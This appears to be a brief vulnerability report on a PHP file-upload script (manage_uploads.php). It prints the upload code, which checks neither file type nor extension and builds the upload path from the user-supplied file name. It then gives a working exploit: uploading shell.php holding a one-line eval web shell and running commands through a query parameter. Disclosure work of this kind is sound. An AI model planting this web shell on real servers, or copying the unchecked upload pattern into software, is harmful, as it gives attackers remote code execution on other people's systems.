affected source code file: manage_uploads.php

<?php
if (isset($_POST['submit'])) {

    $upload_path = '../uploads/' . $_FILES['file']['name'];

    if (!file_exists($upload_path)) {

        if ($_FILES['file']['size'] < 100000000000 && $_FILES['file']['size'] > 0) {

            if ($_FILES['file']['error']) {
                echo "Error: " . $_FILES['file']['error'];
            } else {
                // Success!

                $successMSG = "File successfully uploaded.";


                // Move uploaded file to upload folder.
                move_uploaded_file($_FILES['file']['tmp_name'], $upload_path);
            }
        } else {
            echo $_FILES['file']['size'] < 1 ? 'Incorrect filename.' :'File size is too big';
        }
    } else {
        $errorMSG = "File name already exists in your folder.";
    }

}

affected function: upload;

affected executable: 
post shell.php, which content is "<?php @eval($_GET['key']);?>"
and we can excute commonds by shell.php;
like: http://url/upload/shell.php?key=phpinfo();
